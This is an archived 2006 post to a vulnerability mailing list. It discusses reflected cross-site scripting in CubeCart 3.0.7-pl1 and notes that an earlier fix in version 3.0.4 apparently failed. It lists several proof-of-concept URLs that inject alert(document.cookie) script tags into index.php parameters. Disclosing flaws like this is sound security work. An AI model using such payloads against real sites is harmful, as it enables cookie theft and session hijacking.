[VIM] [OSVDB Mods] CubeCart 3.0.7-pl1 index.php multiple variable cross site scripting
security curmudgeon
jericho at attrition.org
Tue Jan 17 07:31:10 EST 2006
Hey Lostmon,
: CubeCart 3.0.7-pl1 vulnerable.
: Other versions are posible vulnerables too
: Examples:
http://osvdb.org/19861
This is interesting. The cart.php redir variable XSS was disclosed on
2005-09-28 and said to affect 3.0.3, with upgrading to 3.0.4 as a
solution. It appears that version may not have really fixed it, or
vulnerable code was reintroduced to the product.
http://osvdb.org/19860
Same thing with index.php and the 'redir' and 'searchStr' variables.
Reported to affect 3.0.3 and upgrading to 3.0.4 as the solution.
With this report, it seems more variables in index.php are affected now,
specifically:
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewProd"><script>alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>alert(document.cookie)</script>
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>alert(document.cookie)</script>
Very interesting..
Brian
More information about the VIM
mailing list